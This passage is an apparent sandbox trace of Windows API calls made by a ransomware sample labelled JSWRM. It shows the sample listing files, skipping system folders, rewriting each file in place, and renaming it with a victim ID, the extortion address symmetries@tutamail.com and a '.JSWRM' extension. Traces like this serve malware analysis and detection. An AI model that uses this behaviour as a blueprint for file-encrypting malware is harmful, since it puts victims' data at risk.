RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0060.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0060.110] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2052\\jswrm-decrypt.hta")) returned 0x20 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.110] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a7c07c6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232000 [0060.111] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.111] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a7c07c6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0060.111] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.111] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.111] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0060.111] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0060.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0060.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0060.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0060.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.111] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.112] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=5827) returned 1 [0060.112] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16c0) returned 0x23dc88 [0060.112] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x16c0, lpOverlapped=0x0) returned 1 [0060.113] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.114] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x16c0, lpOverlapped=0x0) returned 1 [0060.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.114] CloseHandle (hObject=0x3d4) returned 1 [0060.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0060.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.115] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0060.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.115] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7c07c6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a7c07c6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a7e696b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.115] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.115] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.116] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0060.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0060.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0060.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0060.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.116] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0060.116] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0060.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0060.117] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.117] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=60684) returned 1 [0060.117] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed00) returned 0x2471a8 [0060.117] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xed00, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0xed00, lpOverlapped=0x0) returned 1 [0060.122] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.123] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0xed00, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0xed00, lpOverlapped=0x0) returned 1 [0060.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.124] CloseHandle (hObject=0x3d4) returned 1 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0060.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0060.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0060.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0060.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.172] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.173] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0060.173] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0060.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0060.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.173] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0060.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0060.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0060.174] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, 